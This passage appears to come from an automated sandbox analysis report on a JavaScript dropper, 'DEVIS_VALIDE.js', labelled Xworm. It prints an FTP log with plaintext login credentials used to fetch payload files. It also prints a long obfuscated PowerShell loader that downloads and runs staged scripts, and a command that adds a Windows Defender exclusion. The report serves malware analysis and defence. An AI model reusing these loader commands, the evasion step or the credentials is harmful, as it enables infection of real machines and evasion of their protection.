2024-11-20 10:07:08 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Timestamp	Source Port	Dest Port	Source IP	Dest IP	Commands
Nov 20, 2024 11:06:13.367064953 CET	21	49730	191.252.83.213	192.168.2.4	220 "Servico de FTP da Locaweb"
Nov 20, 2024 11:06:13.370867968 CET	49730	21	192.168.2.4	191.252.83.213	USER desckvbrat1
Nov 20, 2024 11:06:13.781352997 CET	21	49730	191.252.83.213	192.168.2.4	331 Username ok, send password.
Nov 20, 2024 11:06:13.781498909 CET	49730	21	192.168.2.4	191.252.83.213	PASS fYudY1578@@@@@@
Nov 20, 2024 11:06:14.006649971 CET	21	49730	191.252.83.213	192.168.2.4	230 Login successful.
Nov 20, 2024 11:06:14.230370998 CET	21	49730	191.252.83.213	192.168.2.4	501 Invalid argument.
Nov 20, 2024 11:06:14.230571985 CET	49730	21	192.168.2.4	191.252.83.213	PWD
Nov 20, 2024 11:06:14.451147079 CET	21	49730	191.252.83.213	192.168.2.4	257 "/" is the current directory.
Nov 20, 2024 11:06:14.451817989 CET	49730	21	192.168.2.4	191.252.83.213	TYPE I
Nov 20, 2024 11:06:14.674820900 CET	21	49730	191.252.83.213	192.168.2.4	200 Type set to: Binary.
Nov 20, 2024 11:06:14.675137043 CET	49730	21	192.168.2.4	191.252.83.213	PASV
Nov 20, 2024 11:06:14.899075031 CET	21	49730	191.252.83.213	192.168.2.4	227 Entering passive mode (191,252,83,213,234,194).
Nov 20, 2024 11:06:14.923094988 CET	49730	21	192.168.2.4	191.252.83.213	RETR Upcrypter/02/DLL01.txt
Nov 20, 2024 11:06:15.145421028 CET	21	49730	191.252.83.213	192.168.2.4	150 File status okay. About to open data connection.
Nov 20, 2024 11:06:15.545025110 CET	21	49730	191.252.83.213	192.168.2.4	226 Transfer complete.
Nov 20, 2024 11:06:22.303169966 CET	21	49733	191.252.83.213	192.168.2.4	220 "Servico de FTP da Locaweb"
Nov 20, 2024 11:06:22.303379059 CET	49733	21	192.168.2.4	191.252.83.213	USER desckvbrat1
Nov 20, 2024 11:06:22.523231983 CET	21	49733	191.252.83.213	192.168.2.4	331 Username ok, send password.
Nov 20, 2024 11:06:22.525357962 CET	49733	21	192.168.2.4	191.252.83.213	PASS fYudY1578@@@@@@
Nov 20, 2024 11:06:22.755460024 CET	21	49733	191.252.83.213	192.168.2.4	230 Login successful.
Nov 20, 2024 11:06:22.975476980 CET	21	49733	191.252.83.213	192.168.2.4	501 Invalid argument.
Nov 20, 2024 11:06:22.975707054 CET	49733	21	192.168.2.4	191.252.83.213	PWD
Nov 20, 2024 11:06:23.195601940 CET	21	49733	191.252.83.213	192.168.2.4	257 "/" is the current directory.
Nov 20, 2024 11:06:23.195755959 CET	49733	21	192.168.2.4	191.252.83.213	TYPE I
Nov 20, 2024 11:06:23.518193960 CET	21	49733	191.252.83.213	192.168.2.4	200 Type set to: Binary.
Nov 20, 2024 11:06:23.518307924 CET	49733	21	192.168.2.4	191.252.83.213	PASV
Nov 20, 2024 11:06:23.740792990 CET	21	49733	191.252.83.213	192.168.2.4	227 Entering passive mode (191,252,83,213,238,36).
Nov 20, 2024 11:06:23.750405073 CET	49733	21	192.168.2.4	191.252.83.213	RETR Upcrypter/02/Rumpe.txt
Nov 20, 2024 11:06:23.972691059 CET	21	49733	191.252.83.213	192.168.2.4	150 File status okay. About to open data connection.
Nov 20, 2024 11:06:24.359497070 CET	21	49733	191.252.83.213	192.168.2.4	226 Transfer complete.
Nov 20, 2024 11:06:28.369560957 CET	49733	21	192.168.2.4	191.252.83.213	PASV
Nov 20, 2024 11:06:28.758423090 CET	21	49733	191.252.83.213	192.168.2.4	227 Entering passive mode (191,252,83,213,235,231).
Nov 20, 2024 11:06:28.764200926 CET	49733	21	192.168.2.4	191.252.83.213	RETR Upcrypter/02/Entry.txt
Nov 20, 2024 11:06:28.987158060 CET	21	49733	191.252.83.213	192.168.2.4	150 File status okay. About to open data connection.
Nov 20, 2024 11:06:29.372277975 CET	21	49733	191.252.83.213	192.168.2.4	226 Transfer complete.
Nov 20, 2024 11:06:45.546591997 CET	21	49730	191.252.83.213	192.168.2.4	421 Control connection timed out.

Target ID:	0
Start time:	05:06:07
Start date:	20/11/2024
Path:	C:\Windows\System32\wscript.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\DEVIS_VALIDE.js"
Imagebase:	0x7ff6730a0000
File size:	170'496 bytes
MD5 hash:	A47CBE969EA935BDD3AB568BB126BC80
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Target ID:	1
Start time:	05:06:08
Start date:	20/11/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $jPhaA = 'JA' + [char]66 + '2AHgAYg' + [char]66 + 'DAHgAIAA9ACAAJA' + [char]66 + 'oAG8Acw' + [char]66 + '0AC4AVg' + [char]66 + 'lAHIAcw' + [char]66 + 'pAG8AbgAuAE0AYQ' + [char]66 + 'qAG8AcgAuAEUAcQ' + [char]66 + '1AGEAbA' + [char]66 + 'zACgAMgApADsASQ' + [char]66 + 'mACAAKAAgACQAdg' + [char]66 + '4AGIAQw' + [char]66 + '4ACAAKQAgAHsAJA' + [char]66 + 'IAHoATw' + [char]66 + 'NAGoAIAA9ACAAWw' + [char]66 + 'TAHkAcw' + [char]66 + '0AGUAbQAuAEkATwAuAFAAYQ' + [char]66 + '0AGgAXQA6ADoARw' + [char]66 + 'lAHQAVA' + [char]66 + 'lAG0AcA' + [char]66 + 'QAGEAdA' + [char]66 + 'oACgAKQA7AGQAZQ' + [char]66 + 'sACAAKAAkAEgAeg' + [char]66 + 'PAE0AagAgACsAIAAnAFwAVQ' + [char]66 + 'wAHcAaQ' + [char]66 + 'uAC4AbQ' + [char]66 + 'zAHUAJwApADsAJA' + [char]66 + 'qAGsAdw' + [char]66 + 'qAHoAIAA9ACAAJw' + [char]66 + 'oAHQAdA' + [char]66 + 'wAHMAOgAvAC8AZA' + [char]66 + 'yAGkAdg' + [char]66 + 'lAC4AZw' + [char]66 + 'vAG8AZw' + [char]66 + 'sAGUALg' + [char]66 + 'jAG8AbQAvAHUAYwA/AGUAeA' + [char]66 + 'wAG8Acg' + [char]66 + '0AD0AZA' + [char]66 + 'vAHcAbg' + [char]66 + 'sAG8AYQ' + [char]66 + 'kACYAaQ' + [char]66 + 'kAD0AJwA7ACQAUA' + [char]66 + 'pAFUAUQ' + [char]66 + 'iACAAPQAgACQAZQ' + [char]66 + 'uAHYAOg' + [char]66 + 'QAFIATw' + [char]66 + 'DAEUAUw' + [char]66 + 'TAE8AUg' + [char]66 + 'fAEEAUg' + [char]66 + 'DAEgASQ' + [char]66 + 'UAEUAQw' + [char]66 + 'UAFUAUg' + [char]66 + 'FAC4AQw' + [char]66 + 'vAG4AdA' + [char]66 + 'hAGkAbg' + [char]66 + 'zACgAJwA2ADQAJwApADsAaQ' + [char]66 + 'mACAAKAAgACQAUA' + [char]66 + 'pAFUAUQ' + [char]66 + 'iACAAKQAgAHsAJA' + [char]66 + 'qAGsAdw' + [char]66 + 'qAHoAIAA9ACAAKAAkAGoAaw' + [char]66 + '3AGoAegAgACsAIAAnADEAcAAyAGIAcg' + [char]66 + 'qAEgALQ' + [char]66 + 'RAE4AWQA1AGIAcg' + [char]66 + '3AGkATA' + [char]66 + 'aAHUAWQ' + [char]66 + 'zAFcALQ' + [char]66 + 'SADUAOQ' + [char]66 + 'VAHcAag' + [char]66 + 'kAFMARQ' + [char]66 + 'WACcAKQAgADsAfQ' + [char]66 + 'lAGwAcw' + [char]66 + 'lACAAewAkAGoAaw' + [char]66 + '3AGoAegAgAD0AIAAoACQAag' + [char]66 + 'rAHcAag' + [char]66 + '6ACAAKwAgACcAMQ' + [char]66 + 'hAGEASA' + [char]66 + '5ADQALQ' + [char]66 + 'CAEwAMQ' + [char]66 + 'qAHAAQQ' + [char]66 + 'uAGoAaA' + [char]66 + '0AGUAZwA4ADgASw' + [char]66 + 'NAFoANw' + [char]66 + 'jAHUAOAAxAFoAMAA1AHcAJwApACAAOw' + [char]66 + '9ADsAJA' + [char]66 + 'jAHgAcA' + [char]66 + 'mAGQAIAA9ACAAKAAgAE4AZQ' + [char]66 + '3AC0ATw' + [char]66 + 'iAGoAZQ' + [char]66 + 'jAHQAIA' + [char]66 + 'OAGUAdAAuAFcAZQ' + [char]66 + 'iAEMAbA' + [char]66 + 'pAGUAbg' + [char]66 + '0ACAAKQAgADsAJA' + [char]66 + 'jAHgAcA' + [char]66 + 'mAGQALg' + [char]66 + 'FAG4AYw' + [char]66 + 'vAGQAaQ' + [char]66 + 'uAGcAIAA9ACAAWw' + [char]66 + 'TAHkAcw' + [char]66 + '0AGUAbQAuAFQAZQ' + [char]66 + '4AHQALg' + [char]66 + 'FAG4AYw' + [char]66 + 'vAGQAaQ' + [char]66 + 'uAGcAXQA6ADoAVQ' + [char]66 + 'UAEYAOAAgADsAJA' + [char]66 + 'jAHgAcA' + [char]66 + 'mAGQALg' + [char]66 + 'EAG8Adw' + [char]66 + 'uAGwAbw' + [char]66 + 'hAGQARg' + [char]66 + 'pAGwAZQAoACQAag' + [char]66 + 'rAHcAag' + [char]66 + '6ACwAIAAoACQASA' + [char]66 + '6AE8ATQ' + [char]66 + 'qACAAKwAgACcAXA' + [char]66 + 'VAHAAdw' + [char]66 + 'pAG4ALg' + [char]66 + 'tAHMAdQAnACkAIAApACAAOwAkAHQAcA' + [char]66 + 'XAGsARgAgAD0AIAAoACAAJw' + [char]66 + 'DADoAXA' + [char]66 + 'VAHMAZQ' + [char]66 + 'yAHMAXAAnACAAKwAgAFsARQ' + [char]66 + 'uAHYAaQ' + [char]66 + 'yAG8Abg' + [char]66 + 'tAGUAbg' + [char]66 + '0AF0AOgA6AFUAcw' + [char]66 + 'lAHIATg' + [char]66 + 'hAG0AZQAgACkAOw' + [char]66 + 'IAGgAWA' + [char]66 + 'IAEIAIAA9ACAAKAAgACQASA' + [char]66 + '6AE8ATQ' + [char]66 + 'qACAAKwAgACcAXA' + [char]66 + 'VAHAAdw' + [char]66 + 'pAG4ALg' + [char]66 + 'tAHMAdQAnACAAKQAgADsAIA' + [char]66 + 'wAG8Adw' + [char]66 + 'lAHIAcw' + [char]66 + 'oAGUAbA' + [char]66 + 'sAC4AZQ' + [char]66 + '4AGUAIA' + [char]66 + '3AHUAcw' + [char]66 + 'hAC4AZQ' + [char]66 + '4AGUAIA' + [char]66 + 'IAGgAWA' + [char]66 + 'IAEIAIAAvAHEAdQ' + [char]66 + 'pAGUAdAAgAC8Abg' + [char]66 + 'vAHIAZQ' + [char]66 + 'zAHQAYQ' + [char]66 + 'yAHQAIAA7ACAAQw' + [char]66 + 'vAHAAeQAtAEkAdA' + [char]66 + 'lAG0AIAAnACUARA' + [char]66 + 'DAFAASg' + [char]66 + 'VACUAJwAgAC0ARA' + [char]66 + 'lAHMAdA' + [char]66 + 'pAG4AYQ' + [char]66 + '0AGkAbw' + [char]66 + 'uACAAKAAgACQAdA' + [char]66 + 'wAFcAaw' + [char]66 + 'GACAAKwAgACcAXA' + [char]66 + '' + [char]66 + 'AHAAcA' + [char]66 + 'EAGEAdA' + [char]66 + 'hAFwAUg' + [char]66 + 'vAGEAbQ' + [char]66 + 'pAG4AZw' + [char]66 + 'cAE0AaQ' + [char]66 + 'jAHIAbw' + [char]66 + 'zAG8AZg' + [char]66 + '0AFwAVw' + [char]66 + 'pAG4AZA' + [char]66 + 'vAHcAcw' + [char]66 + 'cAFMAdA' + [char]66 + 'hAHIAdAAgAE0AZQ' + [char]66 + 'uAHUAXA' + [char]66 + 'QAHIAbw' + [char]66 + 'nAHIAYQ' + [char]66 + 'tAHMAXA' + [char]66 + 'TAHQAYQ' + [char]66 + 'yAHQAdQ' + [char]66 + 'wACcAIAApACAALQ' + [char]66 + 'mAG8Acg' + [char]66 + 'jAGUAIAA7AHAAbw' + [char]66 + '3AGUAcg' + [char]66 + 'zAGgAZQ' + [char]66 + 'sAGwALg' + [char]66 + 'lAHgAZQAgAC0AYw' + [char]66 + 'vAG0AbQ' + [char]66 + 'hAG4AZAAgACcAcw' + [char]66 + 'sAGUAZQ' + [char]66 + 'wACAAMQA4ADAAJwA7ACAAcw' + [char]66 + 'oAHUAdA' + [char]66 + 'kAG8Adw' + [char]66 + 'uAC4AZQ' + [char]66 + '4AGUAIAAvAHIAIAAvAHQAIAAwACAALw' + [char]66 + 'mACAAfQ' + [char]66 + 'lAGwAcw' + [char]66 + 'lACAAew' + [char]66 + 'bAFMAeQ' + [char]66 + 'zAHQAZQ' + [char]66 + 'tAC4ATg' + [char]66 + 'lAHQALg' + [char]66 + 'TAGUAcg' + [char]66 + '2AGkAYw' + [char]66 + 'lAFAAbw' + [char]66 + 'pAG4AdA' + [char]66 + 'NAGEAbg' + [char]66 + 'hAGcAZQ' + [char]66 + 'yAF0AOgA6AFMAZQ' + [char]66 + 'yAHYAZQ' + [char]66 + 'yAEMAZQ' + [char]66 + 'yAHQAaQ' + [char]66 + 'mAGkAYw' + [char]66 + 'hAHQAZQ' + [char]66 + 'WAGEAbA' + [char]66 + 'pAGQAYQ' + [char]66 + '0AGkAbw' + [char]66 + 'uAEMAYQ' + [char]66 + 'sAGwAYg' + [char]66 + 'hAGMAawAgAD0AIA' + [char]66 + '7ACQAdA' + [char]66 + 'yAHUAZQ' + [char]66 + '9ACAAOw' + [char]66 + 'bAFMAeQ' + [char]66 + 'zAHQAZQ' + [char]66 + 'tAC4ATg' + [char]66 + 'lAHQALg' + [char]66 + 'TAGUAcg' + [char]66 + '2AGkAYw' + [char]66 + 'lAFAAbw' + [char]66 + 'pAG4AdA' + [char]66 + 'NAGEAbg' + [char]66 + 'hAGcAZQ' + [char]66 + 'yAF0AOgA6AFMAZQ' + [char]66 + 'jAHUAcg' + [char]66 + 'pAHQAeQ' + [char]66 + 'QAHIAbw' + [char]66 + '0AG8AYw' + [char]66 + 'vAGwAIAA9ACAAWw' + [char]66 + 'TAHkAcw' + [char]66 + '0AGUAbQAuAE4AZQ' + [char]66 + '0AC4AUw' + [char]66 + 'lAGMAdQ' + [char]66 + 'yAGkAdA' + [char]66 + '5AFAAcg' + [char]66 + 'vAHQAbw' + [char]66 + 'jAG8AbA' + [char]66 + 'UAHkAcA' + [char]66 + 'lAF0AOgA6AFQAbA' + [char]66 + 'zADEAMgAgADsAaQ' + [char]66 + 'mACgAKA' + [char]66 + 'nAGUAdAAtAHAAcg' + [char]66 + 'vAGMAZQ' + [char]66 + 'zAHMAIAAnAFcAaQ' + [char]66 + 'yAGUAcw' + [char]66 + 'oAGEAcg' + [char]66 + 'rACcALAAnAGEAcA' + [char]66 + 'hAHQAZQ' + [char]66 + 'EAE4AUwAnACwAJw' + [char]66 + 'hAG4AYQ' + [char]66 + 'sAHkAeg' + [char]66 + 'lACcAIAAtAGUAYQAgAFMAaQ' + [char]66 + 'sAGUAbg' + [char]66 + '0AGwAeQ' + [char]66 + 'DAG8Abg' + [char]66 + '0AGkAbg' + [char]66 + '1AGUAKQAgAC0AZQ' + [char]66 + 'xACAAJA' + [char]66 + 'OAHUAbA' + [char]66 + 'sACkAewAgAA0ACgAgACAAIAAgACAAIAAgAA0ACg' + [char]66 + '9AA0ACgANAAoAZQ' + [char]66 + 'sAHMAZQ' + [char]66 + '7ACAADQAKAFIAZQ' + [char]66 + 'zAHQAYQ' + [char]66 + 'yAHQALQ' + [char]66 + 'DAG8AbQ' + [char]66 + 'wAHUAdA' + [char]66 + 'lAHIAIAAtAGYAbw' + [char]66 + 'yAGMAZQAgADsADQAKACAAIAAgACAAIAAgAGUAeA' + [char]66 + 'pAHQAIAA7AA0ACgAgAH0AIAA7ACQAag' + [char]66 + 'sAGMAcQ' + [char]66 + 'qACAAPQAgACgAJw' + [char]66 + 'mAHQAcAA6AC8ALw' + [char]66 + 'kAGUAcw' + [char]66 + 'jAGsAdg' + [char]66 + 'iAHIAYQ' + [char]66 + '0ADEAQA' + [char]66 + 'mAHQAcAAuAGQAZQ' + [char]66 + 'zAGMAaw' + [char]66 + '2AGIAcg' + [char]66 + 'hAHQALg' + [char]66 + 'jAG8AbQAuAGIAcgAvAFUAcA' + [char]66 + 'jAHIAeQ' + [char]66 + 'wAHQAZQ' + [char]66 + 'yACcAIAArACAAJwAvADAAMgAvAEQATA' + [char]66 + 'MADAAMQAuAHQAeA' + [char]66 + '0ACcAIAApADsAJA' + [char]66 + 'JAGUAcA' + [char]66 + 'HAFEAIAA9ACAAKAAgAFsAUw' + [char]66 + '5AHMAdA' + [char]66 + 'lAG0ALg' + [char]66 + 'JAE8ALg' + [char]66 + 'QAGEAdA' + [char]66 + 'oAF0AOgA6AEcAZQ' + [char]66 + '0AFQAZQ' + [char]66 + 'tAHAAUA' + [char]66 + 'hAHQAaAAoACkAIAArACAAJw' + [char]66 + 'kAGwAbAAwADEALg' + [char]66 + '0AHgAdAAnACkAOwAkAE8Aag' + [char]66 + 'yAFIAUAAgAD0AIAAoAC0Aag' + [char]66 + 'vAGkAbgAgAFsAYw' + [char]66 + 'oAGEAcg' + [char]66 + 'bAF0AXQAoADEAMAAwACwAMQAwADEALAAxADEANQAsADkAOQAsADEAMAA3ACwAMQAxADgALAA5ADgALAAxADEANAAsADkANwAsADEAMQA2ACwANAA5ACkAKQAgADsAJA' + [char]66 + 'sAGwAbA' + [char]66 + 'HAHEAIAA9ACAAKAAtAGoAbw' + [char]66 + 'pAG4AIA' + [char]66 + 'bAGMAaA' + [char]66 + 'hAHIAWw' + [char]66 + 'dAF0AKAAxADAAMgAsACAAOAA5ACwAIAAxADEANwAsACAAMQAwADAALAAgADgAOQAsACAANAA5ACwAIAA1ADMALAAgADUANQAsACAANQA2ACwAIAA2ADQALAAgADYANAAsACAANgA0ACwAIAA2ADQALAAgADYANAAsACAANgA0ACAAKQApACAAOwAkAHcAZQ' + [char]66 + 'iAEMAbA' + [char]66 + 'pAGUAbg' + [char]66 + '0ACAAPQAgAE4AZQ' + [char]66 + '3AC0ATw' + [char]66 + 'iAGoAZQ' + [char]66 + 'jAHQAIA' + [char]66 + 'TAHkAcw' + [char]66 + '0AGUAbQAuAE4AZQ' + [char]66 + '0AC4AVw' + [char]66 + 'lAGIAQw' + [char]66 + 'sAGkAZQ' + [char]66 + 'uAHQAIAA7ACQAdw' + [char]66 + 'lAGIAQw' + [char]66 + 'sAGkAZQ' + [char]66 + 'uAHQALg' + [char]66 + 'DAHIAZQ' + [char]66 + 'kAGUAbg' + [char]66 + '0AGkAYQ' + [char]66 + 'sAHMAIAA9ACAAbg' + [char]66 + 'lAHcALQ' + [char]66 + 'vAGIAag' + [char]66 + 'lAGMAdAAgAFMAeQ' + [char]66 + 'zAHQAZQ' + [char]66 + 'tAC4ATg' + [char]66 + 'lAHQALg' + [char]66 + 'OAGUAdA' + [char]66 + '3AG8Acg' + [char]66 + 'rAEMAcg' + [char]66 + 'lAGQAZQ' + [char]66 + 'uAHQAaQ' + [char]66 + 'hAGwAKAAkAE8Aag' + [char]66 + 'yAFIAUAAsACAAJA' + [char]66 + 'sAGwAbA' + [char]66 + 'HAHEAKQAgADsAJA' + [char]66 + 'SAFYAVQ' + [char]66 + 'YAHYAIAA9ACAAJA' + [char]66 + '3AGUAYg' + [char]66 + 'DAGwAaQ' + [char]66 + 'lAG4AdAAuAEQAbw' + [char]66 + '3AG4AbA' + [char]66 + 'vAGEAZA' + [char]66 + 'TAHQAcg' + [char]66 + 'pAG4AZwAoACAAJA' + [char]66 + 'qAGwAYw' + [char]66 + 'xAGoAIAApACAAOwAkAFIAVg' + [char]66 + 'VAFgAdgAgAHwAIA' + [char]66 + 'PAHUAdAAtAEYAaQ' + [char]66 + 'sAGUAIAAtAEYAaQ' + [char]66 + 'sAGUAUA' + [char]66 + 'hAHQAaAAgACQASQ' + [char]66 + 'lAHAARw' + [char]66 + 'RACAALQ' + [char]66 + 'FAG4AYw' + [char]66 + 'vAGQAaQ' + [char]66 + 'uAGcAIAAnAFUAVA' + [char]66 + 'GADgAJwAgAC0AZg' + [char]66 + 'vAHIAYw' + [char]66 + 'lACAAOwAkAFMAVA' + [char]66 + 'mAEcAbAAgAD0AIAAoACAAWw' + [char]66 + 'TAHkAcw' + [char]66 + '0AGUAbQAuAEkATwAuAFAAYQ' + [char]66 + '0AGgAXQA6ADoARw' + [char]66 + 'lAHQAVA' + [char]66 + 'lAG0AcA' + [char]66 + 'QAGEAdA' + [char]66 + 'oACgAKQAgACsAIAAnAGQAbA' + [char]66 + 'sADAAMgAuAHQAeA' + [char]66 + '0ACcAKQAgADsAJA' + [char]66 + 'QAGgAcg' + [char]66 + 'sAE4AIAA9ACAATg' + [char]66 + 'lAHcALQ' + [char]66 + 'PAGIAag' + [char]66 + 'lAGMAdAAgAFMAeQ' + [char]66 + 'zAHQAZQ' + [char]66 + 'tAC4ATg' + [char]66 + 'lAHQALg' + [char]66 + 'XAGUAYg' + [char]66 + 'DAGwAaQ' + [char]66 + 'lAG4AdAAgADsAJA' + [char]66 + 'QAGgAcg' + [char]66 + 'sAE4ALg' + [char]66 + 'FAG4AYw' + [char]66 + 'vAGQAaQ' + [char]66 + 'uAGcAIAA9ACAAWw' + [char]66 + 'TAHkAcw' + [char]66 + '0AGUAbQAuAFQAZQ' + [char]66 + '4AHQALg' + [char]66 + 'FAG4AYw' + [char]66 + 'vAGQAaQ' + [char]66 + 'uAGcAXQA6ADoAVQ' + [char]66 + 'UAEYAOAAgADsAJA' + [char]66 + 'EAEgAeg' + [char]66 + 'VAEEAIAAgAD0AIAAoACAARw' + [char]66 + 'lAHQALQ' + [char]66 + 'DAG8Abg' + [char]66 + '0AGUAbg' + [char]66 + '0ACAALQ' + [char]66 + 'QAGEAdA' + [char]66 + 'oACAAJA' + [char]66 + 'JAGUAcA' + [char]66 + 'HAFEAIAApACAAOwAkAHUAVA' + [char]66 + 'sAEgAegAgAD0AIAAkAFAAaA' + [char]66 + 'yAGwATgAuAEQAbw' + [char]66 + '3AG4AbA' + [char]66 + 'vAGEAZA' + [char]66 + 'TAHQAcg' + [char]66 + 'pAG4AZwAoACAAJA' + [char]66 + 'EAEgAeg' + [char]66 + 'VAEEAIAApACAAOwAkAHUAVA' + [char]66 + 'sAEgAegAgAHwAIA' + [char]66 + 'PAHUAdAAtAEYAaQ' + [char]66 + 'sAGUAIAAtAEYAaQ' + [char]66 + 'sAGUAUA' + [char]66 + 'hAHQAaAAgACQAUw' + [char]66 + 'UAGYARw' + [char]66 + 'sACAALQ' + [char]66 + 'mAG8Acg' + [char]66 + 'jAGUAIAA7ACQATQ' + [char]66 + 'PAEQAUg' + [char]66 + 'nACAAPQAgACcAJA' + [char]66 + 'yAHkAYQ' + [char]66 + 'lAEcAIAA9ACAAKA' + [char]66 + 'HAGUAdAAtAEMAbw' + [char]66 + 'uAHQAZQ' + [char]66 + 'uAHQAIAAtAFAAYQ' + [char]66 + '0AGgAIAAnACAAKwAgACQAUw' + [char]66 + 'UAGYARw' + [char]66 + 'sACAAKwAgACcAIAAtAEUAbg' + [char]66 + 'jAG8AZA' + [char]66 + 'pAG4AZwAgAFUAVA' + [char]66 + 'GADgAKQA7ACcAIAA7ACQATQ' + [char]66 + 'PAEQAUg' + [char]66 + 'nACAAKwA9ACAAJw' + [char]66 + 'bAEIAeQ' + [char]66 + '0AGUAWw' + [char]66 + 'dAF0AIAAkAEYAeQ' + [char]66 + 'mAGQAegAgAD0AIA' + [char]66 + 'bAHMAeQ' + [char]66 + 'zAHQAZQ' + [char]66 + 'tAC4AQw' + [char]66 + 'vAG4Adg' + [char]66 + 'lAHIAdA' + [char]66 + 'dADoAOg' + [char]66 + 'GAHIAbw' + [char]66 + 'tAEIAYQ' + [char]66 + 'zAGUANgA0AFMAdA' + [char]66 + 'yAGkAbg' + [char]66 + 'nACgAIAAkAHIAeQ' + [char]66 + 'hAGUARwAuAHIAZQ' + [char]66 + 'wAGwAYQ' + [char]66 + 'jAGUAKAAnACcAkyE6AJMhJwAnACwAJwAnAEEAJwAnACkAIAApACAAOwAnACAAOwAkAE0ATw' + [char]66 + 'EAFIAZwAgACsAPQAgACcAWw' + [char]66 + 'TAHkAcw' + [char]66 + '0AGUAbQAuAEEAcA' + [char]66 + 'wAEQAbw' + [char]66 + 'tAGEAaQ' + [char]66 + 'uAF0AOgA6AEMAdQ' + [char]66 + 'yAHIAZQ' + [char]66 + 'uAHQARA' + [char]66 + 'vAG0AYQ' + [char]66 + 'pAG4ALg' + [char]66 + 'MAG8AYQ' + [char]66 + 'kACgAIAAkAEYAeQ' + [char]66 + 'mAGQAegAgACkALgAnACAAOwAkAE0ATw' + [char]66 + 'EAFIAZwAgACsAPQAgACcARw' + [char]66 + 'lAHQAVA' + [char]66 + '5AHAAZQAoACAAJwAnAEMAbA' + [char]66 + 'hAHMAcw' + [char]66 + 'MAGkAYg' + [char]66 + 'yAGEAcg' + [char]66 + '5ADMALg' + [char]66 + 'DAGwAYQ' + [char]66 + 'zAHMAMQAnACcAIAApAC4ARw' + [char]66 + 'lAHQATQAnACAAOwAkAE0ATw' + [char]66 + 'EAFIAZwAgACsAPQAgACcAZQ' + [char]66 + '0AGgAbw' + [char]66 + 'kACgAIAAnACcAcA' + [char]66 + 'yAEYAVg' + [char]66 + 'JACcAJwAgACkALg' + [char]66 + 'JAG4Adg' + [char]66 + 'vAGsAZQAoACAAJA' + [char]66 + 'uAHUAbA' + [char]66 + 'sACAALAAgAFsAbw' + [char]66 + 'iAGoAZQ' + [char]66 + 'jAHQAWw' + [char]66 + 'dAF0AIAAoACAAJwAnAGsANw' + [char]66 + 'OAG4ATQ' + [char]66 + 'DAFAAQwAvAHcAYQ' + [char]66 + 'yAC8AbQ' + [char]66 + 'vAGMALg' + [char]66 + 'uAGkAYg' + [char]66 + 'lAHQAcw' + [char]66 + 'hAHAALwAvADoAcw' + [char]66 + 'wAHQAdA' + [char]66 + 'oACcAJwAgACwAIAAnACcAJQ' + [char]66 + 'EAEMAUA' + [char]66 + 'KAFUAJQAnACcAIAAsACAAIAAnACcARAAgAEQARA' + [char]66 + 'SAGUAZw' + [char]66 + '' + [char]66 + 'AHMAbQAnACcAIAAgACkAIAApADsAJwA7ACQAVg' + [char]66 + 'CAFcAVw' + [char]66 + '6ACAAPQAgACgAIA' + [char]66 + 'bAFMAeQ' + [char]66 + 'zAHQAZQ' + [char]66 + 'tAC4ASQ' + [char]66 + 'PAC4AUA' + [char]66 + 'hAHQAaA' + [char]66 + 'dADoAOg' + [char]66 + 'HAGUAdA' + [char]66 + 'UAGUAbQ' + [char]66 + 'wAFAAYQ' + [char]66 + '0AGgAKAApACAAKwAgACcAZA' + [char]66 + 'sAGwAMAAzAC4AcA' + [char]66 + 'zADEAJwApACAAOwAkAE0ATw' + [char]66 + 'EAFIAZwAgAHwAIA' + [char]66 + 'PAHUAdAAtAEYAaQ' + [char]66 + 'sAGUAIAAtAEYAaQ' + [char]66 + 'sAGUAUA' + [char]66 + 'hAHQAaAAgACQAVg' + [char]66 + 'CAFcAVw' + [char]66 + '6ACAAIAAtAGYAbw' + [char]66 + 'yAGMAZQAgADsAcA' + [char]66 + 'vAHcAZQ' + [char]66 + 'yAHMAaA' + [char]66 + 'lAGwAbAAgAC0ARQ' + [char]66 + '4AGUAYw' + [char]66 + '1AHQAaQ' + [char]66 + 'vAG4AUA' + [char]66 + 'vAGwAaQ' + [char]66 + 'jAHkAIA' + [char]66 + 'CAHkAcA' + [char]66 + 'hAHMAcwAgAC0ARg' + [char]66 + 'pAGwAZQAgACQAVg' + [char]66 + 'CAFcAVw' + [char]66 + '6ACAAOw' + [char]66 + '9ADsA';$jPhaA = $jPhaA.replace('?','B') ;$jPhaA = [System.Convert]::FromBase64String( $jPhaA ) ;;;$jPhaA = [System.Text.Encoding]::Unicode.GetString( $jPhaA ) ;$jPhaA = $jPhaA.replace('%DCPJU%','C:\Users\user\Desktop\DEVIS_VALIDE.js') ;powershell $jPhaA
Imagebase:	0x7ff788560000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Target ID:	4
Start time:	05:06:16
Start date:	20/11/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File C:\Users\user\AppData\Local\Temp\dll03.ps1
Imagebase:	0x7ff788560000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Target ID:	5
Start time:	05:06:17
Start date:	20/11/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	powershell $S = 'C:\Windows\System32\WindowsPowerShell\v1.0' ; Add-MpPreference -ExclusionPath $S -force ;
Imagebase:	0x7ff788560000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report DEVIS_VALIDE.js

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: Xworm

Yara Signatures

